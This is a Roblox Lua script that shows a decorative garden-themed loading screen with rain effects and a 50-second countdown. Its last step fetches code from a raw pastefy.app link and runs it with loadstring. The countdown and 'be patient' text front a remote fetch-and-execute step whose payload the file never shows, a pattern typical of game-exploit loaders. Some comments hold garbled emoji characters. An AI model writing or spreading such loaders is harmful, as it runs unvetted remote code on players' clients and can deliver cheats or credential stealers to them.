local Players = game:GetService("Players")
local player = Players.LocalPlayer
local playerGui = player:WaitForChild("PlayerGui")

-- Cleanup
if playerGui:FindFirstChild("GardenLoadUI") then
	playerGui.GardenLoadUI:Destroy()
end

local screenGui = Instance.new("ScreenGui", playerGui)
screenGui.Name = "GardenLoadUI"
screenGui.ResetOnSpawn = false
screenGui.IgnoreGuiInset = true

-- Background
local bg = Instance.new("Frame", screenGui)
bg.Size = UDim2.new(1, 0, 1, 0)
bg.BackgroundColor3 = Color3.fromRGB(230, 255, 230)
bg.BorderSizePixel = 0

-- Garden-style color vines/fruits/flowers decorations
local assets = {
	-- ðŸ“ Strawberry
	"rbxassetid://6031091000",
	-- ðŸ‡ Grapes
	"rbxassetid://6031075930",
	-- ðŸ‰ Watermelon
	"rbxassetid://6031068424",
	-- ðŸŒ¿ Vines
	"rbxassetid://507845432",
	-- ðŸŒ¸ Flower
	"rbxassetid://6031094678"
}

for i = 1, #assets do
	local deco = Instance.new("ImageLabel", bg)
	deco.Image = assets[i]
	deco.Size = UDim2.new(0, 64, 0, 64)
	deco.Position = UDim2.new(math.random(), 0, math.random(), 0)
	deco.BackgroundTransparency = 1
	deco.ZIndex = 2
end

-- UI Panel in middle
local panel = Instance.new("Frame", screenGui)
panel.Size = UDim2.new(0, 350, 0, 200)
panel.Position = UDim2.new(0.5, -175, 0.5, -100)
panel.BackgroundColor3 = Color3.fromRGB(255, 250, 240)
panel.BackgroundTransparency = 0.05
panel.BorderSizePixel = 0
panel.ZIndex = 10

local corner = Instance.new("UICorner", panel)
corner.CornerRadius = UDim.new(0, 20)

-- Title
local title = Instance.new("TextLabel", panel)
title.Size = UDim2.new(1, 0, 0, 35)
title.Position = UDim2.new(0, 0, 0, 10)
title.Text = "Waiting to Load Script Patiently"
title.TextColor3 = Color3.fromRGB(255, 120, 180)
title.BackgroundTransparency = 1
title.Font = Enum.Font.FredokaOne
title.TextScaled = true
title.ZIndex = 11

-- Countdown
local counter = Instance.new("TextLabel", panel)
counter.Size = UDim2.new(1, 0, 0, 60)
counter.Position = UDim2.new(0, 0, 0.35, 0)
counter.Text = "50s"
counter.TextColor3 = Color3.fromRGB(100, 200, 150)
counter.BackgroundTransparency = 1
counter.Font = Enum.Font.GothamBlack
counter.TextScaled = true
counter.ZIndex = 11

-- Subtext
local subtext = Instance.new("TextLabel", panel)
subtext.Size = UDim2.new(1, 0, 0, 30)
subtext.Position = UDim2.new(0, 0, 0.7, 0)
subtext.Text = "Be patient if it's not loading or looks stuck!"
subtext.TextColor3 = Color3.fromRGB(120, 120, 120)
subtext.BackgroundTransparency = 1
subtext.Font = Enum.Font.Gotham
subtext.TextScaled = true
subtext.ZIndex = 11

-- Credit
local credit = Instance.new("TextLabel", panel)
credit.Size = UDim2.new(1, 0, 0, 25)
credit.Position = UDim2.new(0, 0, 0.85, 0)
credit.Text = "Credits to Tenshi!"
credit.TextColor3 = Color3.fromRGB(100, 180, 255)
credit.BackgroundTransparency = 1
credit.Font = Enum.Font.Gotham
credit.TextScaled = true
credit.ZIndex = 11

-- Rain
local function spawnRain()
	coroutine.wrap(function()
		while screenGui and screenGui.Parent do
			local drop = Instance.new("Frame", screenGui)
			drop.Size = UDim2.new(0, 2, 0, math.random(10, 30))
			drop.Position = UDim2.new(math.random(), 0, -0.1, 0)
			drop.BackgroundColor3 = Color3.fromRGB(100, 200, 255)
			drop.BorderSizePixel = 0
			drop.ZIndex = 3
			game:GetService("TweenService"):Create(drop, TweenInfo.new(1.5, Enum.EasingStyle.Linear), {
				Position = UDim2.new(drop.Position.X.Scale, 0, 1.2, 0)
			}):Play()
			game:GetService("Debris"):AddItem(drop, 2)
			wait(0.05)
		end
	end)()
end

spawnRain()

-- Countdown Logic
local seconds = 50
coroutine.wrap(function()
	while seconds > 0 do
		counter.Text = seconds .. "s"
		seconds -= 1
		wait(1)
	end
	counter.Text = "Loading..."

	-- ðŸ”½ YOUR LOADSTRING BELOW ðŸ”½
	loadstring(game:HttpGet("https://pastefy.app/EEmKlIPx/raw"))()
end)()
